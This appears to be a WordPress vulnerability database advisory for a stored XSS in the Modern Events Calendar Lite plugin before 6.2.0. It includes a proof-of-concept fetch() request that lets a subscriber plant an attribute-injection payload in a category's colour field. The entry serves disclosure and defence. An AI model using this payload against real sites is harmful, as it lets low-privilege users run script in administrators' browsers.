WordPress Plugin Vulnerabilities
Modern Events Calendar Lite < 6.2.0 - Subscriber+ Category Add Leading to Stored XSS
Description
The plugin alloed any logged-in user, even a subscriber user, may add a category whose parameters are incorrectly escaped in the admin panel, leading to stored XSS.
Proof of Concept
1. Run the following JavaScript in the browser's web console as a subscriber user. 2. Authenticate in a separate browser as an admin user. 3. Go To "M.E. Calendar" -> Categories -> and click on "category" link. fetch("http://127.0.0.1:8001/wp-admin/admin-ajax.php", { "headers": { "content-type": "application/x-www-form-urlencoded", }, "body": new URLSearchParams({"action":"mec_popup_event_category","mec_cat_color": 'color" onfocus=alert(1) autofocus=', "category": "category", "mec_cat_icon": "icon"}), "method": "POST", "credentials": "include" }) .then(response => response.text()) .then(data => console.log(data));
Affects Plugins
References
CVE
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Krzysztof Zając
Submitter
Krzysztof Zając
Submitter website
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-12-03 (about 2 years ago)
Added
2021-12-14 (about 2 years ago)
Last Updated
2022-04-12 (about 2 years ago)